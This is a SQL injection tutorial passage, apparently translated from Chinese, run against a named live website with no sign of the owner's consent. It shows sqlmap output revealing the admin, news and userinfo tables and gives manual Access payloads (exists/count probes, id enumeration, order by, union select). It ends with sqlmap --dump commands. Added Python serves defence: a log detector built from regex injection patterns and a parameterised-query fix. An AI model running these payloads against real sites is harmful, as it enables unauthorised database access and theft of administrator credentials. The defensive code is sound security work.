(I) Guessing table names
root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 --tables
___
__H__
___ ___[,]_____ ___ ___ {1.2.6#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:00:41

[10:00:41] [INFO] resuming back-end DBMS 'microsoft access'
[10:00:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=14 AND 8567=8567

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-6399 UNION ALL SELECT NULL,CHR(113)&CHR(122)&CHR(122)&CHR(122)&CHR(113)&CHR(119)&CHR(100)&CHR(73)&CHR(84)&CHR(66)&CHR(104)&CHR(105)&CHR(113)&CHR(69)&CHR(113)&CHR(106)&CHR(101)&CHR(79)&CHR(78)&CHR(76)&CHR(79)&CHR(80)&CHR(122)&CHR(80)&CHR(116)&CHR(97)&CHR(120)&CHR(70)&CHR(116)&CHR(108)&CHR(68)&CHR(119)&CHR(110)&CHR(66)&CHR(107)&CHR(85)&CHR(108)&CHR(115)&CHR(97)&CHR(101)&CHR(86)&CHR(113)&CHR(77)&CHR(84)&CHR(81)&CHR(113)&CHR(98)&CHR(118)&CHR(112)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
[10:00:42] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:00:42] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[10:00:42] [WARNING] the SQL query provided does not return any output
[10:00:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[10:00:42] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[10:00:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:00:42] [INFO] retrieved:
[10:00:42] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[10:00:42] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[10:00:42] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
which common tables (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/txt/common-tables.txt' (press Enter)
[2] custom
> 1
[10:00:45] [INFO] checking table existence using items from '/usr/share/sqlmap/txt/common-tables.txt'
[10:00:45] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[10:00:47] [INFO] starting 10 threads
[10:00:50] [INFO] retrieved:
admin
[10:00:51] [INFO] retrieved: news
[10:00:54] [INFO] retrieved: userinfo
Database: Microsoft_Access_masterdb
[3 tables]
+----------+
| admin    |
| news     |
| userinfo |
+----------+

[10:03:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3157 times
[10:03:22] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.kfzhongzhou.com'

[*] shutting down at 10:03:22

Tables found: admin, news, userinfo. admin is the administrator table, news is the news table, and userinfo holds user profile data.
Manual Access injection (guessing tables)
(1) and 0<>(select count(*) from table_name)
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and 0<>(select count(*) from admin)

(<>: not equal.) count is an aggregate function that counts the entries in the table. If admin does not exist, (select count(*) from admin) is false, i.e. 0, so 0<>0 (0 is not equal to 0) is false and the page returns an error. If admin exists, 0<>1 holds and the result is true.
(2) and exists (select * from table_name)
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and exists (select * from admin)

exists: specifies a subquery and tests whether any rows exist. The result is a boolean.
and exists (select * from admin): uses exists to test whether the result of select * from admin is true.
select * from admin: queries all the data in the admin table.
Note: exists cannot be used to guess contents; to guess the contents of the admin table use and (select * from admin).
This is used to determine whether the admin table exists in the database: if it does, the page returns normally, otherwise it returns an error.
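The sqlmap run above left 3157 HTTP 500 responses from one client while it walked a table wordlist, and the manual and exists (select ...) and and 0<>(select count(*) ...) probes in this section leave the same footprint in the web server's access log. The Python below is an added example, not code from the original post or from sqlmap: it parses a few constructed IIS W3C-style log lines (client addresses are documentation-range placeholders, and the query strings are modelled on the payloads shown above), URL-decodes the query string, and flags any client that sends several requests carrying SQL probe syntax or collects several 500s. The field layout and the thresholds are assumptions for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed IIS W3C-style access log: date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status. Client addresses are documentation-range placeholders
# and the queries are modelled on the payloads shown in this post.
SAMPLE_LOG = """\
2018-06-20 10:00:41 203.0.113.5 GET /cyjb_xx.asp id=14 200
2018-06-20 10:00:41 203.0.113.5 GET /cyjb_xx.asp id=14%20AND%208567%3D8567 200
2018-06-20 10:00:42 203.0.113.5 GET /cyjb_xx.asp id=-6399%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%26CHR%28122%29%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects 200
2018-06-20 10:00:45 203.0.113.5 GET /cyjb_xx.asp id=14%20AND%20EXISTS%20%28SELECT%20%2A%20FROM%20customers%29 500
2018-06-20 10:00:45 203.0.113.5 GET /cyjb_xx.asp id=14%20AND%20EXISTS%20%28SELECT%20%2A%20FROM%20orders%29 500
2018-06-20 10:00:46 203.0.113.5 GET /cyjb_xx.asp id=14%20and%20exists%20%28select%20%2A%20from%20admin%29 200
2018-06-20 10:00:47 203.0.113.5 GET /cyjb_xx.asp id=14%20order%20by%207 500
2018-06-20 10:00:48 198.51.100.7 GET /cyjb_xx.asp id=14 200
2018-06-20 10:00:49 198.51.100.7 GET /index.asp - 200
"""

# Syntax seen in the probes above: UNION SELECT, ORDER BY n, EXISTS(SELECT,
# COUNT(*), CHR() chains, and the boolean tautology sqlmap used (AND 8567=8567).
SQL_PROBE = re.compile(
    r"union\s+(?:all\s+)?select"
    r"|order\s+by\s+\d+"
    r"|exists\s*\(\s*select"
    r"|count\s*\(\s*\*\s*\)"
    r"|chr\s*\(\s*\d+\s*\)"
    r"|\b(?:and|or)\s+(\d+)\s*=\s*\1\b",
    re.IGNORECASE,
)

LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse_line(line):
    """Split one W3C-style line into a record; returns None for malformed lines."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    date, time, ip, method, stem, query, status = m.groups()
    return {
        "ts": f"{date} {time}",
        "ip": ip,
        "method": method,
        "stem": stem,
        "query": "" if query == "-" else unquote_plus(query),
        "status": int(status),
    }


def analyse(log_text, probe_threshold=3, error_threshold=3):
    """Return {client_ip: [reasons]} for clients whose traffic looks like injection probing."""
    per_client = defaultdict(lambda: {"requests": 0, "sql_probes": 0, "http_500": 0})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        stats = per_client[rec["ip"]]
        stats["requests"] += 1
        if SQL_PROBE.search(rec["query"]):
            stats["sql_probes"] += 1
        if rec["status"] == 500:
            stats["http_500"] += 1

    findings = {}
    for ip, stats in per_client.items():
        reasons = []
        if stats["sql_probes"] >= probe_threshold:
            reasons.append(f"{stats['sql_probes']} of {stats['requests']} requests carry SQL probe syntax")
        if stats["http_500"] >= error_threshold:
            reasons.append(f"{stats['http_500']} HTTP 500 responses")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in analyse(SAMPLE_LOG).items():
        print(ip)
        for reason in reasons:
            print("  -", reason)
```

The 500 count is the cheaper signal: the Access error page that the walkthrough relies on (Microsoft JET Database Engine error '80040e14') is what produced each of those responses, so a burst of 500s on one .asp script from one client is worth alerting on even before the query strings are decoded.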
(II) Guessing fields
(1) Append and exists (select id from admin) to the injection point; if the page returns normally, the admin table has an id field. Then try and exists (select username from admin) and and exists (select password from admin); if both return normally, the username and password fields exist.
For example: http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and exists (select id from admin)
(2) Append and exists (select id from admin where id=1); if an error page comes back, there is no account with id=1, so continue with id=2, and so on, until the page returns normally.
For example: http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and exists (select id from admin where id=81)
With id=81 the page returns normally, so the admin user's id is 81.
(3) Guessing the length (number of columns)
Append order by N to the injection point, where N is a number but cannot be 0.
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 order by 6
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 order by 7 makes the page error:
Microsoft JET Database Engine 错误 '80040e14'
Microsoft Jet 数据库引擎不能将 '7' 识别为一个有效的字段名或表达式。
/cyjb_xx.asp,行 69

This shows the length is 6.
(4) Guessing contents
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 union select 1,2,3,4,5,6 from admin
Columns 2 and 5 are echoed on the page.
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 union select 1,id,3,4,5,6 from admin
This queries the contents of the id field.
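Steps (1) to (4) work only because cyjb_xx.asp pastes the id parameter straight into its SQL. The Python below is an added example, not code from the original post or the site: it stands in for that page with an in-memory sqlite3 database seeded with the three table names the sqlmap run found (column layouts and row contents are constructed placeholders), lookup_vulnerable reproduces the concatenation pattern so the true/false and order by 7 behaviour described above can be observed, and lookup_hardened shows the fix: validate id as a positive integer and bind it as a query parameter. sqlite3 is used in place of Access only because it ships with Python; the SQL shapes involved are the same.

```python
import re
import sqlite3


def build_demo_db():
    """Constructed stand-in for the site's Access database (sqlite3 in memory).

    Only the table names come from the sqlmap run above; column layouts and
    row contents are placeholders invented for this example.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (81, 'admin', '<placeholder-hash>')")
    conn.execute(
        "CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT, "
        "pubdate TEXT, hits INTEGER)"
    )
    conn.execute(
        "INSERT INTO news VALUES (14, 'Sample item', 'constructed body', "
        "'editor', '2018-01-01', 0)"
    )
    conn.execute("CREATE TABLE userinfo (id INTEGER, username TEXT)")
    conn.commit()
    return conn


# Six selected columns, matching the 'order by 6 ok / order by 7 error' observation.
NEWS_QUERY = "SELECT id, title, body, author, pubdate, hits FROM news WHERE id="


def lookup_vulnerable(conn, raw_id):
    """The pattern the post exploits: the request parameter is concatenated into SQL.

    Returns the result rows, or an 'error: ...' string where the real page
    answered with a JET engine error / HTTP 500.
    """
    try:
        return conn.execute(NEWS_QUERY + raw_id).fetchall()
    except sqlite3.Error as exc:
        return "error: " + str(exc)


ID_PATTERN = re.compile(r"[1-9][0-9]{0,9}")


def lookup_hardened(conn, raw_id):
    """Fix: validate the parameter as a positive integer, then bind it.

    Returns None when the input is rejected, so the caller can answer 400
    without ever handing attacker-controlled text to the database.
    """
    candidate = raw_id.strip()
    if not ID_PATTERN.fullmatch(candidate):
        return None
    return conn.execute(NEWS_QUERY + "?", (int(candidate),)).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    # The inputs below are the ones used in the walkthrough above.
    for payload in (
        "14",
        "14 and exists (select id from admin where id=81)",
        "14 and exists (select id from admin where id=1)",
        "14 order by 7",
        "14 union select 1,id,3,4,5,6 from admin",
    ):
        print(repr(payload))
        print("  concatenated:", lookup_vulnerable(db, payload))
        print("  hardened:    ", lookup_hardened(db, payload))
```

In classic ASP the equivalent of the bound parameter is an ADODB.Command with a ? placeholder and a parameter appended via CreateParameter; the integer check belongs before the database is touched, so a malformed id answers with a 400 instead of the JET engine error page that each guessing step above depends on.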
Summary of the sqlmap commands used in this chapter:
root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14
root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 --tables
root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 --columns -T admin
root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 --dump